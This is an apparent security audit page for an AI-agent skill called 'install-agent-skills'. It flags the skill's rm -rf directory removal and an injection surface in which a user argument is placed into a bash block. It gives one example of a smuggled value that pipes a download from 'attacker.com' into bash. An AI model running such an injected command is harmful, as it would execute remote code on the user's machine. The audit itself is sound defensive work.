Skills
skills/jokejason/local-context7/install-agent-skills/Gen Agent Trust Hub

install-agent-skills

Warn

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (MEDIUM): The skill is designed to execute a local bash script (scripts/install.sh) that performs potentially destructive filesystem operations.
  • The script uses rm -rf "$TARGET_SKILL" to remove existing directories before installation.
  • It targets sensitive configuration paths for AI agents, such as ~/.claude/skills, ~/.codex/skills, and ~/.config/opencode/skills.
  • [PROMPT_INJECTION] (LOW): The instructions in SKILL.md present an indirect command injection surface by interpolating the user-provided {argument} directly into a bash script block: SKILL="{argument}".
  • Ingestion points: The $ARGUMENTS variable in SKILL.md Step 3.
  • Boundary markers: None present. The argument is placed directly into a variable assignment within a markdown bash block.
  • Capability inventory: The install.sh script has the capability to delete directories (rm -rf), create directories (mkdir -p), and create symlinks (ln -s).
  • Sanitization: The bash script uses basename "$SOURCE_SKILL" which provides some mitigation against path traversal for the $TARGET_SKILL variable, but the initial command construction in the instructions remains vulnerable if the agent executes the block literally with malicious input (e.g., myskill"; curl http://attacker.com | bash; #).
Audit Metadata
Risk Level
MEDIUM
Analyzed
Feb 17, 2026, 06:23 PM